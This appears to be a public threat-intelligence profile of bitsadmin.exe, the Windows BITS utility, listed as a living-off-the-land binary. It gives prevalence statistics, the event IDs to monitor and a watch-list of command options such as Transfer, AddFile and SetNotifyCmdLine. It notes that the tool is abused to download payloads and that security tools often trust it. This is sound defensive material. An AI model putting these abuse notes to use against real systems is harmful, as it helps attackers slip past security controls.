e1057a20945bce8f00c0be5e3db40c4a98ab33f42f4d2df919aedb0ef6651d6e

You are on a public page with reduced results.

Author: Microsoft

Source: Wild

Threat: LOLBin

Summary

The BITS administration utility allows you to create jobs and monitor the progress of those jobs.

EchoTrail Prevalence Score (EPS)

21.97

Rank Analysis

Host Prevalence

2.9%

Execution Rank

33,215th

Behavioral Analysis

Top Filenames

bitsadmin.exe

100.00 %

Top Paths

C:\Windows\System32

100.00 %

Top Network Ports

No results found.

Ancestry Analysis

Top GrandParents

Top Parents

Top Children

No results found.

Security Analysis

Intel

BITSAdmin is a command-line tool used to manage the BITS (Background Intelligent Transfer Service) service. This tool can be used to create, download, or upload jobs and to monitor their progress. In addition to command-line, there are various PowerShell cmdlets available as well. Some of the nefarious capabilities of this tool can include, but is certainly not limited to privilege escalation, lateral movement, downloading malicious payloads, etc. Why is monitoring the usage of BITSAdmin Important? In no particular order: 1. If you patch your systems, there is a good chance that the solution will leverage the BITS service to download and apply updates. 2. If application allow-listing has been implemented in your environment, it is not uncommon for there to be a default rule to automatically trust or execute Microsoft-signed applications and/or binaries. 3. The same also applies for Antivirus applications where they will not alert on the usage of bitsadmin.exe as it is also trusted. The binary locations for BITSAdmin are as follows: C:\Windows\System32\bitsadmin.exe C:\Windows\SysWOW64\bitsadmin.exe There are native Windows Event Logs available as well for monitoring for usage of the BITSAdmin command-line utility. These logs are located in the Applications and Services Logs -> Microsoft -> Windows -> Bits-Client -> Operational container within Event Viewer. Event ID 3 - BITS Service Created a New Job Event ID 4 - The Transfer Job Is Complete Event ID 5 - The Job Is Cancelled Event ID 59 - BITS Started the Transfer Job - it can also contain the download and/or upload URL that can be useful. Event ID 60 - BITS Stopped the Transfer Job - this also can contain the download and/or upload URL that can be useful. If leveraging Syslog or other types of log aggregators, pay particular attention to the command options including, but not limited to: Transfer Create AddFile SetNotifyFlags SetNotifyCmdLine SetMinRetryDelay SetCustomHeaders Resume Depending on the method in which BITSAdmin was leveraged, PowerShell logs and Admin logs could also contain information relating to BITS activity.